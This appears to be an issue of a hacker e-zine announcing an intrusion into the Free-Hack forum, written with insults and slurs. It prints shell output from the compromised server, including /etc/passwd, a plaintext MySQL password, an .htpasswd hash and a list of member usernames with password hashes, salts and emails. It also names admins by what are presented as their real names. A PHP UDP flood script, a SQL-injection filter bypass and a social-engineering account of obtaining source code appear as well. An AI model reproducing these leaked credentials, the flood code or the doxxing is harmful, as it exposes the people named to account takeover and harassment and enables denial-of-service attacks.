|| ####################################################################
\*======================================================================*/


 ____________________________________________________|_._._._._._._._,
 \___________________________________________________|_|_|_|_|_|_|_|_|
                                                     ! ~ free-hack ~  
                                                                      
Many people will wonder why we owned  Free-Hack  because  they  always
claimed to have nothing to do with fraud and stuff. In  fact  this  is
the second time we owned them but the first time  we  go  public.  The
first time was a few months ago in order to check out what  they  were
doing in their internal eleet priv8 sections.  To  our  surprise  they
really had nothing to do with fraud.  Still,  they  are  part  of  the
problem we call the skiddy breeding of lameness.                      
                                                                      
Actually, there are a few communities where you can find a few skilled
members. Free-Hack is a forum where you can find  two  or  three.  The
rest are simple skidi0ts who have no right to even exist, let alone be
on our internet. Also  the  admins,  particularly  "Suicide"  aka  Mr.
Stefan Finke or  "enco"  aka  Mr.  Enrico  Costanzo  are  nothing  but
arrogant asshats who's only apparent  talent  appears  to  be  banning
people. Oh wait, "Suicide" actually HAS skill. Like  he  mastered  the
usage of Hydra and is now able to hax every Teamspeak  server.  Ph33r.
Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
guy, who had the right spirit and was willing to  learn.  But  getting
promoted to admin in a "hacker" community with ~40k users which has an
"expert" zone for "skilled" members who talk about how to  bypass  the
Webspell SQL Injection filter is the worst thing he could have done...
                                                                      
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| Suicide:                                                           |
| Mir fehlt der Stress, das Adrenalin, der Hass den man auf und      |
| wegen einigen Usern bekommen hat. In den fünf Jahren gab es so     |
| viel Ärger (Fettemama, Hacksector, CIA-World, Grey-Hats,           |
| Black-Hats, Mbk, Speedtest). Wieso will sich niemand mehr mit      |
| uns anlegen?                                                       |
|____________________________________________________________________|
                                                                      
You can have that. There's quite alot of hilarity left in the database
backups we prepared. Do not forget to have a  look  for  yourself.  We
especially liked that guy who trolled  fred777  by  logging  into  his
account:                                                              
                                                                      
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  PM from fred777 to enco:                                          |
|  Hallo,                                                            |
|                                                                    |
|  bitte meinen Namen auf "Wurstkoenig" ändern. Vielen Dank          |
|                                                                    |
|  fred777                                                           |
|____________________________________________________________________|
                                                                      
That one really worked. GG mate!                                      
                                                                      
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| Suicide:                                                           |
| Warum überhaupt umziehen? Der neue Server hat ungefähr die         |
| gleichen Attribute wie der Jetzige. Dazu wird die Firewall um das  |
| doppelte verstärkt. Im Gesamtpaket komme ich da besser weg, als in |
| der momentanen Situation.                                          |
|____________________________________________________________________|
                                                                      
Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
Too ninja again.                                                      

$ uname -a
Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=508(freehack) gid=504(freehack) groups=504(freehack)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
ntp:x:38:38::/etc/ntp:/sbin/nologin
lsadm:x:101:32009::/:/sbin/nologin


$ ls -la /
total 108
drwxr-xr-x  24 root root  4096 Nov 30 02:12 .
drwxr-xr-x  24 root root  4096 Nov 30 02:12 ..
-rw-r--r--   1 root root     0 Nov 30 02:12 .autofsck
-rw-r--r--   1 root root     0 Jan 17  2009 .autorelabel
drwx------   2 root  500  4096 Nov 11 18:43 .spamassassin
lrwxrwxrwx   1 root root    39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
lrwxrwxrwx   1 root root    38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
drwx--x--x   3 root root  4096 Nov 13 09:00 backup
drwxr-xr-x   2 root root  4096 Nov 17 00:24 bin
drwxr-xr-x   2 root root  4096 Jan 26  2010 boot
drwxr-xr-x   7 root root  1900 Nov 30 02:12 dev
drwxr-xr-x  68 root root 12288 Dec  8 21:35 etc
drwx--x--x   8 root root  4096 Nov 14 07:11 home
drwxr-xr-x   9 root root  4096 Nov 12 08:24 lib
drwxr-xr-x   7 root root  4096 Nov 12 08:24 lib64
drwxr-xr-x   2 root root  4096 Jan 26  2010 media
drwxr-xr-x   2 root root  4096 Jan 26  2010 mnt
drwxr-xr-x  10 root root  4096 Nov 12 16:31 opt
dr-xr-xr-x 113 root root     0 Nov 30 02:12 proc
drwxr-x---  14 root root  4096 Dec  8 21:36 root
drwxr-xr-x   2 root root  4096 Nov 17 00:24 sbin
drwxr-xr-x   5 root root 20480 Dec  8 00:24 scripts
drwxr-xr-x   2 root root  4096 Jan 26  2010 selinux
drwxr-xr-x   2 root root  4096 Jan 26  2010 srv
drwxr-xr-x   3 root root     0 Nov 30 02:12 sys
drwxrwxrwt  10 root root  4096 Dec  8 21:36 tmp
drwxr-xr-x  16 root root  4096 Nov 11 18:17 usr
drwxr-xr-x  22 root root  4096 Nov 11 18:01 var

$ ls -la /home/freehack/public_html
total 3100
drwxr-x--- 34 freehack nobody     4096 Dec  4 22:13 .
drwx--x--x 14 freehack freehack   4096 Dec  7 11:15 ..
-rw-r--r--  1 freehack freehack   1086 Dec  4 22:27 .htaccess
drwxr-xr-x 11 freehack freehack   4096 Nov 14 09:24 2tgh9322132k322l1sd
-rw-r--r--  1 freehack freehack   6726 Jan 18  2010 LICENSE
drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _private
drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:28 _vti_bin
drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_cnf
drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_log
drwxr-x---  2 freehack nobody     4096 Nov 14 07:11 _vti_pvt
drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_txt
-rw-r--r--  1 freehack freehack  19341 Jan 18  2010 accessmask.php
-rw-r--r--  1 freehack freehack  12687 Jan 18  2010 admin_rbs.php
-rw-r--r--  1 freehack freehack   2645 Jan 18  2010 admin_rbs_banner_list.php
-rw-r--r--  1 freehack freehack   3089 Jan 18  2010 admin_rbs_convert.php
-rw-r--r--  1 freehack freehack   2667 Jan 18  2010 admin_rbs_d_banner_list.php
-rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_h_banner_list.php
-rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_v_banner_list.php
-rw-r--r--  1 freehack freehack   2681 Jan 18  2010 admin_rbs_x_banner_list.php
-rw-r--r--  1 freehack freehack  39582 Jan 18  2010 admincalendar.php
-rw-r--r--  1 freehack freehack  49644 Jan 18  2010 admininfraction.php
-rw-r--r--  1 freehack freehack  19150 Jan 18  2010 adminlog.php
-rw-r--r--  1 freehack freehack   8149 Jan 18  2010 adminpermissions.php
-rw-r--r--  1 freehack freehack  25516 Jan 18  2010 adminreputation.php
-rw-r--r--  1 freehack freehack   1230 Jan 18  2010 ads.php
-rw-r--r--  1 freehack freehack  23844 Jan 18  2010 ajax.php
-rw-r--r--  1 freehack freehack  75511 Jan 18  2010 album.php
drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:04 amecache
-rw-r--r--  1 freehack freehack  17137 Jan 18  2010 announcement.php
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:04 archive
-rw-r--r--  1 freehack freehack  18309 Jan 18  2010 attachment.php
-rw-r--r--  1 freehack freehack  12512 Jan 18  2010 attachmentpermission.php
-rw-r--r--  1 freehack freehack  80983 Jan 18  2010 automediaembed_admin.php
-rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_footer.php
-rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_header.php
-rw-r--r--  1 freehack freehack   1991 Jan 18  2010 autorefresh_navbar.php
-rw-r--r--  1 freehack freehack   1430 Jan 18  2010 autotagger_ajax.php
-rw-r--r--  1 freehack freehack  19355 Jan 18  2010 avatar.php
-rw-r--r--  1 freehack freehack  46771 Jan 18  2010 banner.png
-rw-r--r--  1 freehack freehack  16461 Jan 18  2010 bbcode.php
drwxr-xr-x  6 freehack freehack   4096 Nov 14 08:06 bilder
drwxr-xr-x  8 freehack freehack   4096 Nov 25 14:18 blog
-rw-r--r--  1 freehack freehack  14782 Jan 18  2010 bookmarksite.php
-rw-r--r--  1 freehack freehack  75327 Jan 18  2010 calendar.php
-rw-r--r--  1 freehack freehack  12083 Jan 18  2010 calendarpermission.php
drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 cgi-bin
-rw-r--r--  1 freehack freehack     43 Jan 18  2010 clear.gif
drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:08 clientscript
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:08 control_examples
-rw-r--r--  1 freehack freehack  14938 Jan 18  2010 converse.php
drwxr-xr-x  3 freehack freehack   4096 Nov 18 14:14 cpa
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:11 cpm
drwxr-xr-x  7 freehack freehack   4096 Nov 14 08:12 cpstyles
-rw-r--r--  1 freehack freehack   3317 Jan 18  2010 cron.php
-rw-r--r--  1 freehack freehack  24049 Jan 18  2010 cronadmin.php
-rw-r--r--  1 freehack freehack  10734 Jan 18  2010 cronlog.php
-rw-r--r--  1 freehack freehack  34087 Jan 18  2010 css.php
drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customavatars
drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customgroupicons
drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:13 customprofilepics
-rw-r--r--  1 freehack freehack  21833 Jan 18  2010 diagnostic.php
-rw-r--r--  1 freehack freehack  47757 Jan 18  2010 editpost.php
-rw-r--r--  1 freehack freehack  11748 Jan 18  2010 email.php
-rw-r--r--  1 freehack freehack  29500 Jan 18  2010 external.php
-rw-r--r--  1 freehack freehack   9786 Jan 18  2010 faq.php
-rw-r--r--  1 freehack freehack  22486 Jan 18  2010 favicon.ico
-rw-r--r--  1 freehack freehack  30137 Jan 18  2010 forum.php
-rw-r--r--  1 freehack freehack  35658 Jan 18  2010 forumdisplay.php
-rw-r--r--  1 freehack freehack  30063 Jan 18  2010 forumpermission.php
-rw-r--r--  1 freehack freehack  15499 Oct 11 10:03 gla_test.php
-rw-r--r--  1 freehack freehack  39830 Jan 18  2010 global.php
-rw-r--r--  1 freehack freehack     53 Oct 24 14:48 googlef4001cc5b1db090b.html
-rw-r--r--  1 freehack freehack 137885 Jan 18  2010 group.php
-rw-r--r--  1 freehack freehack  24919 Jan 18  2010 group_inlinemod.php
-rw-r--r--  1 freehack freehack  10524 Jan 18  2010 groupsubscription.php
-rw-r--r--  1 freehack freehack  25922 Jan 18  2010 help.php
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:13 htaccess
-rw-r--r--  1 freehack freehack   9047 Jan 18  2010 image.php
drwxr-xr-x 20 freehack freehack   4096 Nov 14 08:51 images
drwxr-xr-x  5 freehack freehack   4096 Nov 14 08:52 img
drwxr-xr-x  7 freehack freehack  12288 Dec  4 22:09 includes
-rw-r--r--  1 freehack freehack  19592 Jan 18  2010 index.php
-rw-r--r--  1 freehack freehack  43829 Jan 18  2010 infraction.php
-rw-r--r--  1 freehack freehack 182759 Jan 18  2010 inlinemod.php
-rw-r--r--  1 freehack freehack  10342 Jan 18  2010 joinrequests.php
-rw-r--r--  1 freehack freehack  10222 Jan 18  2010 login.php
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 madp
-rw-r--r--  1 freehack freehack  17066 Jan 18  2010 member.php
-rw-r--r--  1 freehack freehack  15931 Jan 18  2010 member_inlinemod.php
-rw-r--r--  1 freehack freehack  35901 Jan 18  2010 memberlist.php
-rw-r--r--  1 freehack freehack  23867 Jan 18  2010 misc.php
-rw-r--r--  1 freehack freehack  63331 Jan 18  2010 moderation.php
-rw-r--r--  1 freehack freehack   6756 Jan 18  2010 moderator.php
-rw-r--r--  1 freehack freehack  18477 Jan 18  2010 newattachment.php
-rw-r--r--  1 freehack freehack  37104 Jan 18  2010 newreply.php
-rw-r--r--  1 freehack freehack  18911 Jan 18  2010 newthread.php
-rw-r--r--  1 freehack freehack   5725 Jan 18  2010 nex_stats_tend_classes.php
drwxr-xr-x  9 freehack freehack   4096 Nov 25 18:38 nopaste
-rw-r--r--  1 freehack freehack  12095 Jul 20 15:01 oks.png
-rw-r--r--  1 freehack freehack  19604 Jan 18  2010 online.php
-rw-r--r--  1 freehack freehack   7696 Jan 18  2010 payment_gateway.php
-rw-r--r--  1 freehack freehack  11910 Jan 18  2010 payments.php
-rw-r--r--  1 freehack freehack   7889 Jan 18  2010 picture.php
-rw-r--r--  1 freehack freehack  22040 Jan 18  2010 picture_inlinemod.php
-rw-r--r--  1 freehack freehack  25311 Jan 18  2010 picturecomment.php
-rw-r--r--  1 freehack freehack  27415 Jan 18  2010 poll.php
-rw-r--r--  1 freehack freehack  17744 Jan 18  2010 post_thanks.php
-rw-r--r--  1 freehack freehack   9512 Jan 18  2010 posthistory.php
-rw-r--r--  1 freehack freehack  74369 Jan 18  2010 postings.php
-rw-r--r--  1 freehack freehack   4763 Jan 18  2010 pprm.php
-rw-r--r--  1 freehack freehack   6594 Jan 18  2010 printthread.php
-rw-r--r--  1 freehack freehack  70748 Jan 18  2010 private.php
-rw-r--r--  1 freehack freehack 152336 Jan 18  2010 profile.php
-rw-r--r--  1 freehack freehack   2712 Feb  3  2010 rbs_banner.php
-rw-r--r--  1 freehack freehack  39751 Jan 18  2010 register.php
-rw-r--r--  1 freehack freehack   5688 Jan 18  2010 report.php
-rw-r--r--  1 freehack freehack  13720 Jan 18  2010 reputation.php
-rw-r--r--  1 freehack freehack 124717 Jan 18  2010 search.php
-rw-r--r--  1 freehack freehack  20694 Jan 18  2010 sendmessage.php
-rw-r--r--  1 freehack freehack  10009 Jan 18  2010 showgroups.php
-rw-r--r--  1 freehack freehack  11374 Jan 18  2010 showpost.php
-rw-r--r--  1 freehack freehack  73470 Jan 18  2010 showthread.php
drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:59 signaturepics
drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 sitemap
-rw-r--r--  1 freehack freehack  32848 Jan 18  2010 subscription.php
-rw-r--r--  1 freehack freehack  51471 Sep 11 14:10 support.php
-rw-r--r--  1 freehack freehack  13365 Jan 18  2010 tags.php
-rw-r--r--  1 freehack freehack   8692 Jan 18  2010 threadrate.php
-rw-r--r--  1 freehack freehack  12415 Jan 18  2010 threadtag.php
drwxrwxrwx  2 freehack freehack   4096 Dec  8 03:30 tmp
-rw-r--r--  1 freehack freehack  34512 Jan 18  2010 usercp.php
-rw-r--r--  1 freehack freehack  19098 Jan 18  2010 usernote.php
drwxrwxrwx  7 freehack freehack   4096 Nov 14 09:06 vboptimise
drwxr-xr-x  4 freehack freehack   4096 Dec  4 22:11 vbseo
-rw-r--r--  1 freehack freehack  45172 Sep 14 01:00 vbseo.php
drwxr-xr-x  4 freehack freehack   4096 Nov 14 09:14 vbseo_sitemap
-rw-r--r--  1 freehack freehack   4221 Sep 14 01:00 vbseocp.php
-rw-r--r--  1 freehack freehack  27357 Jan 18  2010 visitormessage.php
-rw-r--r--  1 freehack freehack   8431 Jan 18  2010 whoquotedme.php
-rw-r--r--  1 freehack freehack    334 Oct  7 11:32 x.php


RETARDED PHP CODE ALERT!

$ cat x.php
<?
if(!$_GET['target'])
{
    die('no target ip specified!');
}
$target = $_GET['t'];

$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock) die(__LINE__);

$data='';
for($i=0;$i<1400;$i++)
{
  $data.=chr(rand(0,255));
}

while(true)
{
  if(!socket_sendto($sock,$data,strlen($data),0,$target,9)) die(__LINE__);
echo('.');
}

?>



$ cd 2tgh9322132k322l1sd

$ ls
total 252
drwxr-xr-x 11 508 504  4096 Nov 14 09:24 .
drwxr-x--- 34 508  99  4096 Dec  4 22:13 ..
-rw-r--r--  1 508 504   129 Nov 14 09:24 .htaccess
-rw-r--r--  1 508 504    42 Nov 14 09:24 .htpasswd
drwxr-xr-x  2 508 504  4096 Nov 14 07:22 ReadMe
-rw-r--r--  1 508 504  3661 Nov 14 09:20 config.php
-rw-r--r--  1 508 504 58442 Sep 22  2009 config_overview.php
drwxr-xr-x  4 508 504  4096 Nov 14 07:16 css
-rw-r--r--  1 508 504 19372 Sep 22  2009 dump.php
-rw-r--r--  1 508 504   512 Nov 14 09:20 error_log
-rw-r--r--  1 508 504 22059 Sep 22  2009 filemanagement.php
-rw-r--r--  1 508 504   640 Sep 22  2009 help.php
drwxr-xr-x  2 508 504  4096 Nov 14 07:17 images
drwxr-xr-x  4 508 504  4096 Nov 14 07:18 inc
-rw-r--r--  1 508 504   871 Sep 22  2009 index.php
-rw-r--r--  1 508 504 24781 Sep 22  2009 install.php
drwxr-xr-x  4 508 504  4096 Nov 14 07:18 js
drwxr-xr-x 17 508 504  4096 Nov 14 07:22 language
-rw-r--r--  1 508 504  5461 Sep 22  2009 log.php
-rw-r--r--  1 508 504  1256 Sep 22  2009 main.php
-rw-r--r--  1 508 504  3930 Sep 22  2009 menu.php
drwxr-xr-x  2 508 504  4096 Nov 14 07:22 msd_cron
-rw-r--r--  1 508 504   776 Sep 22  2009 refresh_dblist.php
-rw-r--r--  1 508 504 15762 Sep 22  2009 restore.php
-rw-r--r--  1 508 504 10187 Sep 22  2009 sql.php
drwxr-xr-x  5 508 504  4096 Nov 14 07:22 tpl
drwxrwxrwx  5 508 504  4096 Nov 14 09:20 work

$ cat .htpasswd
Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1

$ cat config.php
<?php
// MySQL Dumper Configuration

// Host-Adress, default 'localhost'
$config['dbhost'] = 'localhost';
// port - if empty, mysql uses default
$config['dbport'] = '';
// socket - if empty, mysql uses default
$config['dbsocket'] = '';

// Username
$config['dbuser'] = 'freehack';
//User-Pass. For no Password leave empty
$config['dbpass'] = '7qm#2nwAc$oU';

//Speed Values between 50 and 1000000
//use low values if you have bad connection or slow machines
$config['minspeed']=100;
$config['maxspeed']=50000;

// Interface language and style
$config['language']='en';
$config['theme']='msd';

//Shows the Serveradress if 1
$config['interface_server_caption']=1;
$config['interface_server_captioncolor']='#ff9966';
//Position of the Serveradress 0=left, 1=right
$config['interface_server_caption_position']=0;

//Height of the SQL-Box in Mini-SQL in pixel
$config['interface_sqlboxsize']=70;
$config['interface_table_compact']=0;

// Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
$config['memory_limit']=100000;

// For gz-Compression set to 1, without compression set to 0
$config['compression']=1;

//Refreshtime for MySQL processlist in msec, use any value >1000
$config['processlist_refresh']=3000;

$config['empty_db_before_restore']=0;
$config['optimize_tables_beforedump']=1;
$config['stop_with_error']=1;

// For sending a mail after backup set send_mail to 1, otherless set to 0
$config['send_mail']=0;
// Attach the backup 0=no  1=yes
$config['send_mail_dump']=0;
// set the recieve adress for the mail
$config['email_recipient']='';
$config['email_recipient_cc']='';
// set the sender adress (the script)
$config['email_sender']='';

//max. Size of Email-Attach, here 3 MB
$config['email_maxsize1']=3;
$config['email_maxsize2']=2;

// FTP Server Configuration for Transfer
$config['ftp_transfer'][0]=0;
$config['ftp_timeout'][0]=30;
$config['ftp_useSSL'][0]=0;
$config['ftp_mode'][0]=0;
$config['ftp_server'][0]=''; // Adress of FTP-Server
$config['ftp_port'][0]='21'; // Port
$config['ftp_user'][0]=''; // Username
$config['ftp_pass'][0]=''; // Password
$config['ftp_dir'][0]=''; // Upload-Directory

$config['ftp_transfer'][1]=0;
$config['ftp_timeout'][1]=30;
$config['ftp_useSSL'][1]=0;
$config['ftp_mode'][1]=0;
$config['ftp_server'][1]='';
$config['ftp_port'][1]='21';
$config['ftp_user'][1]='';
$config['ftp_pass'][1]='';
$config['ftp_dir'][1]='';

$config['ftp_transfer'][2]=0;
$config['ftp_timeout'][2]=30;
$config['ftp_useSSL'][2]=0;
$config['ftp_mode'][2]=0;
$config['ftp_server'][2]='';
$config['ftp_port'][2]='21';
$config['ftp_user'][2]='';
$config['ftp_pass'][2]='';
$config['ftp_dir'][2]='';

//Multipart 0=off 1=on
$config['multi_part']=0;
$config['multipartgroesse1']=1;
$config['multipartgroesse2']=2;
$config['multipart_groesse']=0;

//Auto-Delete 0=off 1=on
$config['auto_delete']=0;
$config['max_backup_files']=3;

//configuration file
$config['cron_configurationfile']='mysqldumper.conf.php';
//path to perl, for windows use e.g. C:perlbinperl.exe
$config['cron_perlpath']='/usr/bin/perl';
//mailer use sendmail(1) or SMTP(0)
$config['cron_use_sendmail']=1;
//path to sendmail
$sendmail_path=ini_get('sendmail_path');
$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';

//adress of smtp-server
$config['cron_smtp']='localhost';
//smtp-port
$config['cron_smtp_port']=25;
$config['cron_extender']=0;
$config['cron_compression']=1;
$config['cron_printout']=1;
$config['cron_completelog']=1;
$config['cron_comment']='';
$config['multi_dump']=0;
$config['logcompression']=1;
$config['log_maxsize1']=1;
$config['log_maxsize2']=2;
$config['log_maxsize']=1048576;


               ________________________                     
              |                        |_____    __          
              | FREE-HACK LIST OF LAME |     |__|  |_________
              |________________________|     |::|  |        /
 /\**/\       |                        \.____|::|__|      <  
( o_o  )_     |                              \::/  \._______\
 (u--u   \_)  |                                         
  (||___   )==\                                         
,dP"/b/=( /P"/b\                                        
|8 || 8\=== || 8                                        
`b,  ,P  `b,  ,P                                        
  """`     """`    

AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:[email protected]
fred777:50a1eab4c63175c910df92d870136e43:^"@:[email protected]
N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:[email protected]
100:f97becbc6292ac264119ca57881f643c:a<":[email protected]
Dexx:f59393b26641a10966b1400b17f20a93:e>>:[email protected]
noctem:23b5d90e4e8047f014ed439b092da804:l4i:[email protected]
Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:[email protected]
sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:[email protected]
Apex:2d6725508c6f575996e99add1df75b78:#fj:[email protected]
Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::[email protected]
inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:[email protected]
H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:[email protected]
meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:[email protected]
J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:[email protected]
#b:07ff2d241ac7b8bfda85295ad74532db:@ce:[email protected]
enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:[email protected]
Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:[email protected]
Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:[email protected]
PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:[email protected]
GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:[email protected]
GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:[email protected]
Qgel:c1f57278216436f781d102fa254a077b:'yV:[email protected]
DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:[email protected]
Suicide:c4944d15980260f4e446b679e1769395:]fL:[email protected]
novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:[email protected]
ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:[email protected]
krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:[email protected]

We think that novaca!ne's  magic_quotes bypass is quite representative 
for this group:                                                        

--snip snip--

Bypass magic_quotes (novaca!ne)
magic_quotes is a php setting (php.ini). 
It causes that every ' (single-quote), " (double quote) and  \ (backslash)
are escaped with a backslash automatically, a weak but wellknown securing method.
This is how to bypass it:
Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command 
into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling. 
‘ OR ‘a’ = ‘a equals
String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)

--snip snip--

novaca!ne is (next  to fred777) of course, our new security superhero!
Congratz, faggot...                                                   
                                                                      
Finally we shouldn't forget our old fag superhero fred777, who  helped
us to understand how we could get every source code of  a  page.  This
sounds pretty hard, but fred777 shows his priv8  techniques  (we  fear
them):                                                                

--snip snip--
#########################################################
#     Sourcecode disclosure by social engineering        
#                   tested on NPD                        
#########################################################

Intro:
Ich schildere hier mal einen Fall, welchen ich letztens
noch vor mir hatte. Ich war durch Zufall mal wieder auf den
vielen NPD Seiten, um nach Lücken zu suchen.
Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte
es den Anschein, als ob sich da eine SQL Injection befände.

Sobald nämlich der Limitparameter falsch übergeben wurde, kam der
übliche SQL Error:

---------------------------------------------------------

Rein logisch sah der Query so aus:

SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;

Als ich dann mittels eines Scripts versuchte den Query mit UNION
zu erweitern, wollte es aber nicht funktionieren.
Klar dafür konnte es so einige Gründe geben, allerdings hätte
ich mir zu gerne den Source + Abfragen angeschaut.

---------------------------------------------------------

Wieso eigentlich nicht?

Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den
Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt.

--snip snip--

What we learned is:                                                   
- If we write an email to an admin we always get the source code      
- fred777 uses tools to exploit some sql injection                    
                                                                      
"o_O", one of the banned users puts it nicely: "being lame is  one  of
fred777's master skills" Just to inform you: We owned  Free-Hack  with
this technique of course.                                             
                                                                      
TIME FOR SOME                                                         
______________________________________________________________________
IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI
Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI
Ip|     __|  |.---.-.-----.|   _   |  |_|  |_.---.-.----.|  |--.|  |aI
Ia|__     |  ||  _  |  _  ||       |   _|   _|  _  |  __||    < |__|lI
Il|_______|__||___._|   __||___|___|____|____|___._|____||__|__||__|sI
Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI
IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI
                                                                      
Right, who deserves it? Correct! Suicide and  enco  for  being  badass
super high skilled computer professionals    ...    NOT               
                                                                      
This is a warning Free-Hack. Continue existing and  we  will  show  no
mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.    

,_._._._._._._._|____________________________________________________ 
|_|_|_|_|_|_|_|_|___________________________________________________/ 
 ~ last words ~ !                                                     
                                                                      
That's all for now. We hope that those we have  owned  understood  the
warning and that those who already enjoyed issue  one  were  satisfied
